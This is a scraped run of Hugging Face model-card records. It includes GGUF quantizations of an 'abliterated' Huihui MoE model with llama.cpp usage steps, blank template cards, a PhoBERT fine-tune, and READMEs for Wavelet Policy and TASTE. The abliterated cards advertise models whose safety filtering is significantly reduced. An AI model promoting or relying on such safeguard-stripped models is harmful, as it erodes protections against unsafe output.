[More Information Needed] ## Bias, Risks, and Limitations <!-- This section is meant to convey both technical and sociotechnical limitations. --> [More Information Needed] ### Recommendations <!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. --> Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations. ## How to Get Started with the Model Use the code below to get started with the model. [More Information Needed] ## Training Details ### Training Data <!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. --> [More Information Needed] ### Training Procedure <!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. --> #### Preprocessing [optional] [More Information Needed] #### Training Hyperparameters - **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision --> #### Speeds, Sizes, Times [optional] <!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. --> [More Information Needed] ## Evaluation <!-- This section describes the evaluation protocols and provides the results. --> ### Testing Data, Factors & Metrics #### Testing Data <!-- This should link to a Dataset Card if possible. --> [More Information Needed] #### Factors <!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. --> [More Information Needed] #### Metrics <!-- These are the evaluation metrics being used, ideally with a description of why. 
--> [More Information Needed] ### Results [More Information Needed] #### Summary ## Model Examination [optional] <!-- Relevant interpretability work for the model goes here --> [More Information Needed] ## Environmental Impact <!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly --> Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700). - **Hardware Type:** [More Information Needed] - **Hours used:** [More Information Needed] - **Cloud Provider:** [More Information Needed] - **Compute Region:** [More Information Needed] - **Carbon Emitted:** [More Information Needed] ## Technical Specifications [optional] ### Model Architecture and Objective [More Information Needed] ### Compute Infrastructure [More Information Needed] #### Hardware [More Information Needed] #### Software [More Information Needed] ## Citation [optional] <!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. --> **BibTeX:** [More Information Needed] **APA:** [More Information Needed] ## Glossary [optional] <!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. --> [More Information Needed] ## More Information [optional] [More Information Needed] ## Model Card Authors [optional] [More Information Needed] ## Model Card Contact [More Information Needed]
Triangle104/Huihui-MoE-1.3B-A0.6B-abliterated-Q5_K_S-GGUF
Triangle104
2025-06-11T10:22:31Z
0
0
transformers
[ "transformers", "gguf", "moe", "llama-cpp", "gguf-my-repo", "text-generation", "base_model:huihui-ai/Huihui-MoE-1.3B-A0.6B-abliterated", "base_model:quantized:huihui-ai/Huihui-MoE-1.3B-A0.6B-abliterated", "license:apache-2.0", "endpoints_compatible", "region:us" ]
text-generation
2025-06-11T10:22:24Z
--- license: apache-2.0 base_model: huihui-ai/Huihui-MoE-1.3B-A0.6B-abliterated library_name: transformers license_link: https://huggingface.co/Qwen/Qwen3-0.6B/blob/main/LICENSE pipeline_tag: text-generation tags: - moe - llama-cpp - gguf-my-repo extra_gated_prompt: '**Usage Warnings** “**Risk of Sensitive or Controversial Outputs**”: This model’s safety filtering has been significantly reduced, potentially generating sensitive, controversial, or inappropriate content. Users should exercise caution and rigorously review generated outputs. “**Not Suitable for All Audiences**”: Due to limited content filtering, the model’s outputs may be inappropriate for public settings, underage users, or applications requiring high security. “**Legal and Ethical Responsibilities**”: Users must ensure their usage complies with local laws and ethical standards. Generated content may carry legal or ethical risks, and users are solely responsible for any consequences. “**Research and Experimental Use**”: It is recommended to use this model for research, testing, or controlled environments, avoiding direct use in production or public-facing commercial applications. “**Monitoring and Review Recommendations**”: Users are strongly advised to monitor model outputs in real-time and conduct manual reviews when necessary to prevent the dissemination of inappropriate content. “**No Default Safety Guarantees**”: Unlike standard models, this model has not undergone rigorous safety optimization. huihui.ai bears no responsibility for any consequences arising from its use.' ---

# Triangle104/Huihui-MoE-1.3B-A0.6B-abliterated-Q5_K_S-GGUF
This model was converted to GGUF format from [`huihui-ai/Huihui-MoE-1.3B-A0.6B-abliterated`](https://huggingface.co/huihui-ai/Huihui-MoE-1.3B-A0.6B-abliterated) using llama.cpp via ggml.ai's [GGUF-my-repo](https://huggingface.co/spaces/ggml-org/gguf-my-repo) space.
Refer to the [original model card](https://huggingface.co/huihui-ai/Huihui-MoE-1.3B-A0.6B-abliterated) for more details on the model.

## Use with llama.cpp
Install llama.cpp through brew (works on Mac and Linux):

```bash
brew install llama.cpp
```

Invoke the llama.cpp server or the CLI.

### CLI:
```bash
llama-cli --hf-repo Triangle104/Huihui-MoE-1.3B-A0.6B-abliterated-Q5_K_S-GGUF --hf-file huihui-moe-1.3b-a0.6b-abliterated-q5_k_s.gguf -p "The meaning to life and the universe is"
```

### Server:
```bash
llama-server --hf-repo Triangle104/Huihui-MoE-1.3B-A0.6B-abliterated-Q5_K_S-GGUF --hf-file huihui-moe-1.3b-a0.6b-abliterated-q5_k_s.gguf -c 2048
```

Note: You can also use this checkpoint directly through the [usage steps](https://github.com/ggerganov/llama.cpp?tab=readme-ov-file#usage) listed in the llama.cpp repo.

Step 1: Clone llama.cpp from GitHub.
```
git clone https://github.com/ggerganov/llama.cpp
```

Step 2: Move into the llama.cpp folder and build it with the `LLAMA_CURL=1` flag along with other hardware-specific flags (for example, `LLAMA_CUDA=1` for Nvidia GPUs on Linux).
```
cd llama.cpp && LLAMA_CURL=1 make
```

Step 3: Run inference through the main binary.
```
./llama-cli --hf-repo Triangle104/Huihui-MoE-1.3B-A0.6B-abliterated-Q5_K_S-GGUF --hf-file huihui-moe-1.3b-a0.6b-abliterated-q5_k_s.gguf -p "The meaning to life and the universe is"
```
or
```
./llama-server --hf-repo Triangle104/Huihui-MoE-1.3B-A0.6B-abliterated-Q5_K_S-GGUF --hf-file huihui-moe-1.3b-a0.6b-abliterated-q5_k_s.gguf -c 2048
```
LT3/definitions-oxford-llama-8B-instruct
LT3
2025-06-11T10:20:18Z
0
0
null
[ "safetensors", "text-generation", "en", "arxiv:1910.09700", "base_model:unsloth/Meta-Llama-3.1-8B-Instruct", "base_model:finetune:unsloth/Meta-Llama-3.1-8B-Instruct", "license:mit", "region:us" ]
text-generation
2025-06-10T11:59:33Z
--- license: mit language: - en base_model: - unsloth/Meta-Llama-3.1-8B-Instruct pipeline_tag: text-generation --- # Model Card for Model ID <!-- Provide a quick summary of what the model is/does. --> This modelcard aims to be a base template for new models. It has been generated using [this raw template](https://github.com/huggingface/huggingface_hub/blob/main/src/huggingface_hub/templates/modelcard_template.md?plain=1). ## Model Details ### Model Description <!-- Provide a longer summary of what this model is. --> - **Developed by:** [More Information Needed] - **Funded by [optional]:** [More Information Needed] - **Shared by [optional]:** [More Information Needed] - **Model type:** [More Information Needed] - **Language(s) (NLP):** [More Information Needed] - **License:** [More Information Needed] - **Finetuned from model [optional]:** [More Information Needed] ### Model Sources [optional] <!-- Provide the basic links for the model. --> - **Repository:** [More Information Needed] - **Paper [optional]:** [More Information Needed] - **Demo [optional]:** [More Information Needed] ## Uses <!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. --> ### Direct Use <!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. --> [More Information Needed] ### Downstream Use [optional] <!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app --> [More Information Needed] ### Out-of-Scope Use <!-- This section addresses misuse, malicious use, and uses that the model will not work well for. --> [More Information Needed] ## Bias, Risks, and Limitations <!-- This section is meant to convey both technical and sociotechnical limitations. --> [More Information Needed] ### Recommendations <!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. --> Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations. ## How to Get Started with the Model Use the code below to get started with the model. [More Information Needed] ## Training Details ### Training Data <!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. --> [More Information Needed] ### Training Procedure <!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. --> #### Preprocessing [optional] [More Information Needed] #### Training Hyperparameters - **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision --> #### Speeds, Sizes, Times [optional] <!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. --> [More Information Needed] ## Evaluation <!-- This section describes the evaluation protocols and provides the results. --> ### Testing Data, Factors & Metrics #### Testing Data <!-- This should link to a Dataset Card if possible. --> [More Information Needed] #### Factors <!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. 
--> [More Information Needed] #### Metrics <!-- These are the evaluation metrics being used, ideally with a description of why. --> [More Information Needed] ### Results [More Information Needed] #### Summary ## Model Examination [optional] <!-- Relevant interpretability work for the model goes here --> [More Information Needed] ## Environmental Impact <!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly --> Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700). - **Hardware Type:** [More Information Needed] - **Hours used:** [More Information Needed] - **Cloud Provider:** [More Information Needed] - **Compute Region:** [More Information Needed] - **Carbon Emitted:** [More Information Needed] ## Technical Specifications [optional] ### Model Architecture and Objective [More Information Needed] ### Compute Infrastructure [More Information Needed] #### Hardware [More Information Needed] #### Software [More Information Needed] ## Citation [optional] <!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. --> **BibTeX:** [More Information Needed] **APA:** [More Information Needed] ## Glossary [optional] <!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. --> [More Information Needed] ## More Information [optional] [More Information Needed] ## Model Card Authors [optional] [More Information Needed] ## Model Card Contact [More Information Needed]
lurenjia384/wavelet_policy_model
lurenjia384
2025-06-11T10:19:53Z
0
1
null
[ "arxiv:2504.04991", "region:us" ]
null
2025-04-08T09:56:40Z
<a name="readme-top"></a> <br /> <div align="center"> <a href="https://github.com/lurenjia384/Wavelet_Policy"> <img src="images/logo.png" alt="Logo" width="100" height="100"> </a> <h3 align="center">Wavelet Policy</h3> <p align="center"> Imitation Policy Learning in the Frequency Domain with Wavelet Transforms <br /> <a href="https://youtu.be/WnUJzu8MQBk">Quick-Start Demo</a> · <a href="https://arxiv.org/abs/2504.04991">Paper on arXiv</a> · <a href="https://www.youtube.com/watch?v=ak8riKGEG0s">Presentation Video</a> </p> </div> # Wavelet Policy <p align="center"><img src="images/head.png" width="95%"/></p> > 🔍 **Abstract:** > Most imitation learning policies treat the problem as a time-series prediction task, directly mapping high-dimensional observations—such as visual input and proprioception—into action space. While time-series methods focus on spatial-domain modeling, they often overlook inherent temporal patterns in action sequences. To address this, we recast imitation learning policies in the frequency domain and propose **Wavelet Policy**. Our approach applies discrete wavelet transforms (WT) for feature preprocessing, then uses a Single-Encoder-Multiple-Decoder (SE2MD) architecture to extract multi-scale frequency-domain features. To further enrich feature mapping and boost capacity, we insert a Learnable Frequency-Domain Filter (LFDF) after each frequency decoder, improving robustness under varying visual conditions. Experiments show that Wavelet Policy outperforms state-of-the-art end-to-end methods by over 10 % across four challenging robotic-arm tasks while keeping model size comparable. In long-horizon settings, its performance degrades more gracefully as task complexity increases. The code will be released publicly. --- ## 📝 Striving for a Simple and Efficient Embodied Intelligence Model <p align="center"><img src="images/model.png" width="95%"/></p> --- ## 💻 System Requirements | Component | Requirement | | ---------------- | ---------------------------------------- | | Operating System | Ubuntu 20.04 | | GPU Memory | Training: ≥ 4 GB; Inference: ≥ 2 GB | | Disk Space | 100–200 GB (datasets) | | GPU Support | NVIDIA GPU with CUDA support recommended | > 📌 For detailed hardware specs, see the “Experimental Setup” section in the paper. --- ## ⚙️ Environment Configuration We recommend using a `conda` environment. 
Quick install steps:

```bash
git clone https://github.com/lurenjia384/Wavelet_Policy
cd Wavelet_Policy

# Create conda environment
conda create -n Wavelet_Policy python=3.7.16 -y
conda activate Wavelet_Policy

# Install dependencies
pip install -r requirements.txt
```

---

## 📁 Project Structure

```bash
Wavelet_Policy/
├── images             # Images for GitHub display
├── pre_model          # Pretrained models
├── log                # Log files
├── assets             # Robot fixtures or CAD assets
├── pytorch_wavelets   # Wavelet transform utilities
├── vid_path           # Saved inference videos
├── infer.py           # Inference script
├── model.py           # Network definitions
├── utils.py           # Configuration and helper code
├── requirements.txt   # Python dependencies
├── LICENSE
└── README.md
```

---

## 🔗 Pre-trained Model Download

Pre-trained weights and configurations are available on Hugging Face: 👉 [WaveletPolicy-base](https://huggingface.co/lurenjia384/wavelet_policy_model)

| Cameras | Dataset | Params (M) | Download (closed) |
| :-----: | :----------------: | :--------: | :------------------------------------------------------------------------------------------------------------------------------- |
| One | Transfer Cube | 17.22 | [best\_model\_11.pt](https://huggingface.co/lurenjia384/wavelet_policy_model/resolve/main/task_1/best_model_11.pt?download=true) |
| Two | Transfer Cube | — | coming soon |
| One | Bimanual Insertion | 17.22 | coming soon |
| Two | Bimanual Insertion | — | coming soon |
| One | Transfer Plus | 17.22 | [best\_model\_13.pt](https://huggingface.co/lurenjia384/wavelet_policy_model/resolve/main/task_3/best_model_13.pt?download=true) |
| Two | Transfer Plus | — | coming soon |
| One | Stack Two Blocks | 17.22 | coming soon |
| Two | Stack Two Blocks | — | coming soon |

After downloading, place the model files under:

```
Wavelet_Policy/
├── pre_model
```

You can also load models directly with `huggingface_hub` (no need for `--netdir` or `--stats_path`):

```python
from huggingface_hub import hf_hub_download

model_path = hf_hub_download(
    repo_id="lurenjia384/wavelet_policy_model",
    filename="task_3/best_model_13.pt"
)
stats_path = hf_hub_download(
    repo_id="lurenjia384/wavelet_policy_model",
    filename="task_3/task_3.pkl"
)
```

---

## 🚀 Quick Start

**Run inference:**

```bash
python infer.py --task_name {task_name} \
    --stats_path {data_pkl_path.pkl} \
    --netdir {model_path.pt} \
    --no_visualization {0|1}
```

**Example:** Transfer Plus task, with visualization enabled:

```bash
python infer.py --task_name sim_transfer_cube_scripted_plus --no_visualization 0
```

If you still run into difficulties, see the demonstration video: [Quick-Start Demo](https://youtu.be/WnUJzu8MQBk).

Other valid values for `--task_name` are:

* `sim_transfer_cube_scripted` — Transfer Cube
* `sim_insertion_scripted` — Bimanual Insertion
* `Put` — Stack Two Blocks

**Train the model:**

Coming soon…

---

## 📊 Experimental Results

**Table:** Success rates (%) of Wavelet Policy vs.
five baselines across four tasks and three stages | Model | TC-1 | TC-2 | TC-3 | BI-1 | BI-2 | BI-3 | TP-1 | TP-2 | TP-3 | ST-1 | ST-2 | ST-3 | | --------- | -----: | -----: | -----: | -----: | -----: | -----: | -----: | -----: | -----: | -----: | -----: | -----: | | DP (DDIM) | 9 | 6 | 4 | 4 | 3 | 1 | 2 | 1 | 1 | 1 | 1 | 1 | | ACT | 98 | 96 | 94 | 81 | 73 | 68 | 66 | 57 | 57 | 85 | 67 | 50 | | NL-ACT | 94 | 91 | 90 | 83 | 74 | 70 | 62 | 55 | 55 | 82 | 65 | 48 | | HACT-Vq | 98 | 98 | 97 | 87 | 82 | 76 | **79** | 68 | 68 | 90 | 76 | 55 | | InterACT | **98** | 88 | 82 | **88** | 78 | 44 | — | — | — | — | — | — | | Ours | 98 | **98** | **97** | 87 | **82** | **78** | 78 | **70** | **70** | **96** | **79** | **59** | > **Note:** Bold entries denote the best performance in each column. > `—` indicates no experiment for that method. > `TC`: Transfer Cube; `BI`: Bimanual Insertion; `TP`: Transfer Plus; `ST`: Stack Two Blocks. > The number after each task name indicates the stage. > See the paper for full experimental details. --- ## 📬 Contact If you encounter any issues, please open an [issue](https://github.com/lurenjia384/Wavelet_Policy/issues) or email the author: * 📧 [[email protected]](mailto:[email protected]) As mentioned in the paper’s conclusion, we will continue to improve the model and advance real-robot validation ⭐. We welcome feedback and collaboration opportunities 📫. --- ## ❤️ Acknowledgments We gratefully acknowledge the following resources and contributors: 1. **[DISCOVER Robotics](https://air.tsinghua.edu.cn/info/1147/2175.htm)** — An open platform for Embodied Artificial Intelligence research. 2. **[ACT](https://github.com/tonyzhaozh/act)** — Used for baseline data generation. 3. **[pytorch\_wavelets](https://github.com/fbcotter/pytorch_wavelets)** — Wavelet transform utilities. 4. **[ZJU](https://pi.zju.edu.cn/)** — Support from the graduate school. 5. **[ZJUT](https://ie.zjut.edu.cn/)** — Support from my alma mater. Special thanks to my senior colleagues and advisor for their guidance and contributions. Thanks to all contributors and supporters who help us improve this project! --- ## 🔗 BibTeX Citation ```bibtex @article{yang2025wavelet, title = {Wavelet Policy: Imitation Policy Learning in Frequency Domain with Wavelet Transforms}, author = {Yang, Changchuan and Dong, Yuhang and Tian, Guanzhong and Ge, Haizhou and Zhu, Hongrui}, journal = {arXiv preprint arXiv:2504.04991}, year = {2025} } ```
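As background for the DWT-based preprocessing described above, here is an illustrative sketch (not taken from this repo; shapes and wavelet choice are assumptions) of a multi-level 1-D discrete wavelet transform using the bundled `pytorch_wavelets` package:

```python
import torch
from pytorch_wavelets import DWT1DForward, DWT1DInverse

# 3-level 1-D DWT with a Daubechies-4 wavelet.
dwt = DWT1DForward(J=3, wave="db4")
idwt = DWT1DInverse(wave="db4")

x = torch.randn(8, 14, 100)  # (batch, action dims, timesteps); illustrative shape
lowpass, highpass = dwt(x)   # low-frequency band plus a list of 3 high-frequency bands
x_rec = idwt((lowpass, highpass))  # reconstruction, up to boundary padding
```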
vijayakumaran92/Unmodel_Male_10
vijayakumaran92
2025-06-11T10:19:32Z
0
0
null
[ "license:cc-by-nc-nd-4.0", "region:us" ]
null
2025-06-11T10:06:20Z
--- license: cc-by-nc-nd-4.0 ---
AIPlans/Qwen-HHH-Sans-Eng
AIPlans
2025-06-11T10:19:15Z
0
0
transformers
[ "transformers", "safetensors", "qwen2", "text-generation", "trl", "sft", "conversational", "arxiv:1910.09700", "autotrain_compatible", "text-generation-inference", "endpoints_compatible", "region:us" ]
text-generation
2025-06-11T09:38:10Z
--- library_name: transformers tags: - trl - sft --- # Model Card for Model ID <!-- Provide a quick summary of what the model is/does. --> ## Model Details ### Model Description <!-- Provide a longer summary of what this model is. --> This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated. - **Developed by:** [More Information Needed] - **Funded by [optional]:** [More Information Needed] - **Shared by [optional]:** [More Information Needed] - **Model type:** [More Information Needed] - **Language(s) (NLP):** [More Information Needed] - **License:** [More Information Needed] - **Finetuned from model [optional]:** [More Information Needed] ### Model Sources [optional] <!-- Provide the basic links for the model. --> - **Repository:** [More Information Needed] - **Paper [optional]:** [More Information Needed] - **Demo [optional]:** [More Information Needed] ## Uses <!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. --> ### Direct Use <!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. --> [More Information Needed] ### Downstream Use [optional] <!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app --> [More Information Needed] ### Out-of-Scope Use <!-- This section addresses misuse, malicious use, and uses that the model will not work well for. --> [More Information Needed] ## Bias, Risks, and Limitations <!-- This section is meant to convey both technical and sociotechnical limitations. --> [More Information Needed] ### Recommendations <!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. --> Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations. ## How to Get Started with the Model Use the code below to get started with the model. [More Information Needed] ## Training Details ### Training Data <!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. --> [More Information Needed] ### Training Procedure <!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. --> #### Preprocessing [optional] [More Information Needed] #### Training Hyperparameters - **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision --> #### Speeds, Sizes, Times [optional] <!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. --> [More Information Needed] ## Evaluation <!-- This section describes the evaluation protocols and provides the results. --> ### Testing Data, Factors & Metrics #### Testing Data <!-- This should link to a Dataset Card if possible. --> [More Information Needed] #### Factors <!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. --> [More Information Needed] #### Metrics <!-- These are the evaluation metrics being used, ideally with a description of why. 
--> [More Information Needed] ### Results [More Information Needed] #### Summary ## Model Examination [optional] <!-- Relevant interpretability work for the model goes here --> [More Information Needed] ## Environmental Impact <!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly --> Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700). - **Hardware Type:** [More Information Needed] - **Hours used:** [More Information Needed] - **Cloud Provider:** [More Information Needed] - **Compute Region:** [More Information Needed] - **Carbon Emitted:** [More Information Needed] ## Technical Specifications [optional] ### Model Architecture and Objective [More Information Needed] ### Compute Infrastructure [More Information Needed] #### Hardware [More Information Needed] #### Software [More Information Needed] ## Citation [optional] <!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. --> **BibTeX:** [More Information Needed] **APA:** [More Information Needed] ## Glossary [optional] <!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. --> [More Information Needed] ## More Information [optional] [More Information Needed] ## Model Card Authors [optional] [More Information Needed] ## Model Card Contact [More Information Needed]
Ductratra/my-phobert-mlm
Ductratra
2025-06-11T10:18:38Z
17
0
transformers
[ "transformers", "tensorboard", "safetensors", "roberta", "fill-mask", "generated_from_trainer", "base_model:vinai/phobert-large", "base_model:finetune:vinai/phobert-large", "license:mit", "autotrain_compatible", "endpoints_compatible", "region:us" ]
fill-mask
2025-06-08T08:23:17Z
--- library_name: transformers license: mit base_model: vinai/phobert-large tags: - generated_from_trainer metrics: - accuracy model-index: - name: mlm_output results: [] --- <!-- This model card has been generated automatically according to the information the Trainer had access to. You should probably proofread and complete it, then remove this comment. --> # mlm_output This model is a fine-tuned version of [vinai/phobert-large](https://huggingface.co/vinai/phobert-large) on an unknown dataset. It achieves the following results on the evaluation set: - Loss: 1.4771 - Accuracy: 0.7101 ## Model description More information needed ## Intended uses & limitations More information needed ## Training and evaluation data More information needed ## Training procedure ### Training hyperparameters The following hyperparameters were used during training: - learning_rate: 5e-05 - train_batch_size: 16 - eval_batch_size: 16 - seed: 42 - optimizer: Use OptimizerNames.ADAMW_TORCH with betas=(0.9,0.999) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments - lr_scheduler_type: linear - num_epochs: 20.0 ### Training results ### Framework versions - Transformers 4.53.0.dev0 - Pytorch 2.6.0+cu124 - Datasets 3.6.0 - Tokenizers 0.21.1
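The card omits a usage snippet. A minimal sketch with the fill-mask pipeline, assuming the usual PhoBERT conventions (word-segmented Vietnamese input and the `<mask>` token):

```python
from transformers import pipeline

fill = pipeline("fill-mask", model="Ductratra/my-phobert-mlm")

# PhoBERT expects word-segmented input (multi-syllable words joined by underscores).
for pred in fill("Hà_Nội là thủ_đô của <mask> ."):
    print(pred["token_str"], round(pred["score"], 4))
```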
Triangle104/Huihui-MoE-1.3B-A0.6B-abliterated-Q4_K_M-GGUF
Triangle104
2025-06-11T10:17:33Z
0
0
transformers
[ "transformers", "gguf", "moe", "llama-cpp", "gguf-my-repo", "text-generation", "base_model:huihui-ai/Huihui-MoE-1.3B-A0.6B-abliterated", "base_model:quantized:huihui-ai/Huihui-MoE-1.3B-A0.6B-abliterated", "license:apache-2.0", "endpoints_compatible", "region:us" ]
text-generation
2025-06-11T10:17:22Z
--- license: apache-2.0 base_model: huihui-ai/Huihui-MoE-1.3B-A0.6B-abliterated library_name: transformers license_link: https://huggingface.co/Qwen/Qwen3-0.6B/blob/main/LICENSE pipeline_tag: text-generation tags: - moe - llama-cpp - gguf-my-repo extra_gated_prompt: '**Usage Warnings** “**Risk of Sensitive or Controversial Outputs**”: This model’s safety filtering has been significantly reduced, potentially generating sensitive, controversial, or inappropriate content. Users should exercise caution and rigorously review generated outputs. “**Not Suitable for All Audiences**”: Due to limited content filtering, the model’s outputs may be inappropriate for public settings, underage users, or applications requiring high security. “**Legal and Ethical Responsibilities**”: Users must ensure their usage complies with local laws and ethical standards. Generated content may carry legal or ethical risks, and users are solely responsible for any consequences. “**Research and Experimental Use**”: It is recommended to use this model for research, testing, or controlled environments, avoiding direct use in production or public-facing commercial applications. “**Monitoring and Review Recommendations**”: Users are strongly advised to monitor model outputs in real-time and conduct manual reviews when necessary to prevent the dissemination of inappropriate content. “**No Default Safety Guarantees**”: Unlike standard models, this model has not undergone rigorous safety optimization. huihui.ai bears no responsibility for any consequences arising from its use.' ---

# Triangle104/Huihui-MoE-1.3B-A0.6B-abliterated-Q4_K_M-GGUF
This model was converted to GGUF format from [`huihui-ai/Huihui-MoE-1.3B-A0.6B-abliterated`](https://huggingface.co/huihui-ai/Huihui-MoE-1.3B-A0.6B-abliterated) using llama.cpp via ggml.ai's [GGUF-my-repo](https://huggingface.co/spaces/ggml-org/gguf-my-repo) space.
Refer to the [original model card](https://huggingface.co/huihui-ai/Huihui-MoE-1.3B-A0.6B-abliterated) for more details on the model.

## Use with llama.cpp
Install llama.cpp through brew (works on Mac and Linux):

```bash
brew install llama.cpp
```

Invoke the llama.cpp server or the CLI.

### CLI:
```bash
llama-cli --hf-repo Triangle104/Huihui-MoE-1.3B-A0.6B-abliterated-Q4_K_M-GGUF --hf-file huihui-moe-1.3b-a0.6b-abliterated-q4_k_m.gguf -p "The meaning to life and the universe is"
```

### Server:
```bash
llama-server --hf-repo Triangle104/Huihui-MoE-1.3B-A0.6B-abliterated-Q4_K_M-GGUF --hf-file huihui-moe-1.3b-a0.6b-abliterated-q4_k_m.gguf -c 2048
```

Note: You can also use this checkpoint directly through the [usage steps](https://github.com/ggerganov/llama.cpp?tab=readme-ov-file#usage) listed in the llama.cpp repo.

Step 1: Clone llama.cpp from GitHub.
```
git clone https://github.com/ggerganov/llama.cpp
```

Step 2: Move into the llama.cpp folder and build it with the `LLAMA_CURL=1` flag along with other hardware-specific flags (for example, `LLAMA_CUDA=1` for Nvidia GPUs on Linux).
```
cd llama.cpp && LLAMA_CURL=1 make
```

Step 3: Run inference through the main binary.
```
./llama-cli --hf-repo Triangle104/Huihui-MoE-1.3B-A0.6B-abliterated-Q4_K_M-GGUF --hf-file huihui-moe-1.3b-a0.6b-abliterated-q4_k_m.gguf -p "The meaning to life and the universe is"
```
or
```
./llama-server --hf-repo Triangle104/Huihui-MoE-1.3B-A0.6B-abliterated-Q4_K_M-GGUF --hf-file huihui-moe-1.3b-a0.6b-abliterated-q4_k_m.gguf -c 2048
```
MediaTek-Research/Llama-1B-TASTE-V0
MediaTek-Research
2025-06-11T10:16:21Z
505
11
null
[ "onnx", "safetensors", "taste", "en", "arxiv:2504.07053", "base_model:meta-llama/Llama-3.2-1B", "base_model:quantized:meta-llama/Llama-3.2-1B", "license:apache-2.0", "region:us" ]
null
2025-03-25T10:15:42Z
--- license: apache-2.0 language: - en base_model: - meta-llama/Llama-3.2-1B ---

# TASTE: Text-Aligned Speech Tokenization and Embedding for Spoken Language Modeling

[[Demo](https://mtkresearch.github.io/TASTE-SpokenLM.github.io/)] [[Paper](https://arxiv.org/abs/2504.07053)] [[Code](https://github.com/mtkresearch/TASTE-SpokenLM)]

<b>Liang-Hsuan Tseng*, Yi-Chang Chen*, Kuan-Yi Lee, Da-Shan Shiu, Hung-yi Lee</b><br/>*Equal contribution

Large Language Models (LLMs) excel in text-based natural language processing tasks but remain constrained by their reliance on textual inputs and outputs. To enable more natural human-LLM interaction, recent progress has focused on deriving a spoken language model (SLM) that can not only listen but also generate speech. To achieve this, a promising direction is to conduct speech-text joint modeling. However, recent SLMs still lag behind text LLMs due to the modality mismatch. One significant mismatch is the difference in sequence length between speech and text tokens. To address this, we introduce <b>T</b>ext-<b>A</b>ligned <b>S</b>peech <b>T</b>okenization and <b>E</b>mbedding (<b>TASTE</b>), a method that directly addresses the modality gap by aligning speech tokens with the corresponding text transcription during the tokenization stage. We achieve this through a special aggregation mechanism, with speech reconstruction as the training objective. We conduct extensive experiments and show that TASTE preserves essential paralinguistic information while dramatically reducing the token sequence length. Furthermore, by leveraging TASTE, we can adapt text-based LLMs into effective SLMs with parameter-efficient fine-tuning techniques such as Low-Rank Adaptation (LoRA). Experimental results on benchmark tasks, including SALMON and StoryCloze, demonstrate that TASTE-based SLMs perform similarly to previous full-finetuning methods. To our knowledge, TASTE is the first end-to-end approach that uses a reconstruction objective to automatically learn a text-aligned speech tokenization and embedding suitable for spoken language modeling.
Triangle104/Huihui-MoE-1.3B-A0.6B-abliterated-Q4_K_S-GGUF
Triangle104
2025-06-11T10:16:20Z
0
0
transformers
[ "transformers", "gguf", "moe", "llama-cpp", "gguf-my-repo", "text-generation", "base_model:huihui-ai/Huihui-MoE-1.3B-A0.6B-abliterated", "base_model:quantized:huihui-ai/Huihui-MoE-1.3B-A0.6B-abliterated", "license:apache-2.0", "endpoints_compatible", "region:us" ]
text-generation
2025-06-11T10:16:05Z
